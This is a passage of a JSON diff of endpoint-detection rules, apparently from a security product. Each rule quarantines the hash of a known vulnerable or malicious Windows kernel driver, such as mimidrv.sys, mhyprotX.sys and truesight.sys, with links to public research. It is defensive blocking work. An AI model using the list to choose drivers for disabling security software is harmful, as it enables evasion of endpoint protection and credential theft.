+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978118Z",
+ "creation_date": "2026-03-23T11:45:29.978120Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978125Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a4ac619fb531793945ad4c72bdd809ebd38512fc234aa452cb8364ee05465a7b",
+ "comment": "Vulnerable Kernel Driver (aka BlackBoneDrv10.sys) [https://www.loldrivers.io/drivers/722772ee-a461-48ec-933d-f3df1578963e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d48f7729-0e8c-5b4d-85c7-2435444e071e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.463156Z",
+ "creation_date": "2026-03-23T11:45:30.463159Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.463167Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c42c1e5c3c04163bf61c3b86b04a5ec7d302af7e254990cef359ac80474299da",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d4934a41-6399-58da-9792-2d15e83ab4ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611847Z",
+ "creation_date": "2026-03-23T11:45:29.611849Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611854Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "247aadaf17ed894fcacf3fc4e109b005540e3659fd0249190eb33725d3d3082f",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d49b4bc1-1750-5a85-aa8c-b4a14b095e91",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471162Z",
+ "creation_date": "2026-03-23T11:45:30.471165Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d15a0bc7a39bbeff10019496c1ed217b7c1b26da37b2bdd46820b35161ddb3c4",
+ "comment": "Vulnerable Kernel Driver (aka rwdrv.sys) [https://www.loldrivers.io/drivers/fbdd993b-47b1-4448-8c41-24c310802398/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d4d17544-6fc3-5f62-9746-36cafa10f69a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984355Z",
+ "creation_date": "2026-03-23T11:45:29.984357Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984363Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "945ee05244316ff2f877718cf0625d4eb34e6ec472f403f958f2a700f9092507",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d4e81788-1731-517f-a25d-040acd961ee7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.140345Z",
+ "creation_date": "2026-03-23T11:45:31.140347Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.140352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b33b3a531fc9b0d0353b218a6b0abfdf4094c8eec8b7403da1088eb9916f4741",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d4ee88a1-4146-5737-ac5b-be1589934f0a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.161111Z",
+ "creation_date": "2026-03-23T11:45:31.161113Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.161118Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "716d44fbbb56c412b9307a7e5d666d1e166e8d2fa3e5e07cf34e9c5bdc4770ef",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d503b77e-f329-50c3-a63f-151e515a02c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466157Z",
+ "creation_date": "2026-03-23T11:45:30.466160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466169Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8206ce9c42582ac980ff5d64f8e3e310bc2baa42d1a206dd831c6ab397fbd8fe",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d51a04e4-66c5-5bbb-8d46-0b31a85a8104",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.813667Z",
+ "creation_date": "2026-03-23T11:45:31.813669Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.813674Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0fd8ec1bd57418e63f9f752ed48e5183221543fd5e4d8b2dba60fa8590433978",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d52667b7-fe4b-5476-aa1e-eefabe930e5d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.984564Z",
+ "creation_date": "2026-03-23T11:45:29.984566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.984572Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e96edcd1d5daeb7cbbc2602e9cdf2fd6723cbde0cfcf65eded6d02b58c58473",
+ "comment": "Vulnerable Kernel Driver (aka inpoutx64.sys) [https://www.loldrivers.io/drivers/91ff1575-9ff2-46fd-8bfe-0bb3e3457b7f/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d53903c7-00b6-53f5-99f6-1a0abdc55de4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.488759Z",
+ "creation_date": "2026-03-23T11:45:31.488761Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.488767Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "045df00af2228ec0219665623a5a6145e9a55e39d88e0b916dfcfd1de3186efb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d546c29e-4f59-5ca0-9608-9642a9dd0923",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.458022Z",
+ "creation_date": "2026-03-23T11:45:30.458025Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.458035Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f77fe6b1e0e913ac109335a8fa2ac4961d35cbbd50729936059aba8700690a9e",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d547e928-c81e-5089-887d-6b306a6cbc9f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145344Z",
+ "creation_date": "2026-03-23T11:45:32.145348Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145356Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fdf15402013191f701086e188d88041481f1562aa43e4ca8a21f4d489e791a36",
+ "comment": "Vulnerable Kernel Driver (aka SeasunProtect.sys) [https://www.loldrivers.io/drivers/3a9ea9a6-e5e3-439a-b892-1f78dd990099/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d54de769-b192-5f54-89ae-caa79107b1bf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968060Z",
+ "creation_date": "2026-03-23T11:45:29.968062Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968067Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "71a12491b91eff58d2c834160bf8eb03be2e78548c9d06f435b31d9e7dcaecd8",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d563ccb2-9a1e-5c5d-976f-06fbf2b613a4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.978597Z",
+ "creation_date": "2026-03-23T11:45:29.978599Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.978604Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "635273eaa4c2e20c4ec320c6c8447ce2e881984e97c9ed6aeec4fad16b934e81",
+ "comment": "Vulnerable Kernel Driver (aka bwrsh.sys) [https://www.loldrivers.io/drivers/974de971-1f78-47b9-8049-6c34f294acd5/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d575975a-d1be-5e7f-ab24-10783b482040",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452217Z",
+ "creation_date": "2026-03-23T11:45:30.452221Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "b531f0a11ca481d5125c93c977325e135a04058019f939169ce3cdedaddd422d",
+ "comment": "Vulnerable Kernel Driver (aka mhyprot3.sys) [https://www.loldrivers.io/drivers/2aa003cd-5f36-46a6-ae3d-f5afc2c8baa3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5a842a5-67e6-5e8b-bde2-a999c285fd5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156518Z",
+ "creation_date": "2026-03-23T11:45:31.156519Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156525Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "db77b9e868b942f5a4e7779e210b73699ff8f26dc7e92acc39ddc614e73374e6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5ab7150-9289-5e04-85b4-e6aa51a17667",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613858Z",
+ "creation_date": "2026-03-23T11:45:29.613860Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613865Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "15bc804877a607ba0d017df9f6ac951ac7ffbcca8069c5ba28e0cf505f7553b8",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5b2b465-2733-5f3b-98ff-edbdaa4f1e2c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493569Z",
+ "creation_date": "2026-03-23T11:45:31.493572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.493581Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fb27b99f572f95051a227285e5adbc4c4135952f8b54323a3b9c19bda2082ab2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5b8bb83-4dc4-58c5-a900-2599dc102649",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.616686Z",
+ "creation_date": "2026-03-23T11:45:29.616688Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.616693Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "42579a759f3f95f20a2c51d5ac2047a2662a2675b3fb9f46c1ed7f23393a0f00",
+ "comment": "American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5c10855-2efd-5a3a-962a-4ecddd197f77",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143224Z",
+ "creation_date": "2026-03-23T11:45:32.143226Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143231Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683",
+ "comment": "Vulnerable Kernel Driver (aka iQVW64.SYS) [https://www.loldrivers.io/drivers/4dd3289c-522c-4fce-b48e-5370efc90fa1/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5c67434-06e4-5fb0-aca7-c87df30dda42",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459985Z",
+ "creation_date": "2026-03-23T11:45:30.459988Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459997Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "516159871730b18c2bddedb1a9da110577112d4835606ee79bb80e7a58784a13",
+ "comment": "Vulnerable Kernel Driver (aka LgDataCatcher.sys) [https://www.loldrivers.io/drivers/5961e133-ccc3-4530-8f4f-5d975c41028d/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "d5d7fd6e-ebd8-565b-add0-af8148705c4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.831218Z",
+ "creation_date": "2026-03-23T11:45:30.831221Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.831226Z",
+ "rule_level": null,
+ "rule_level_override": null,
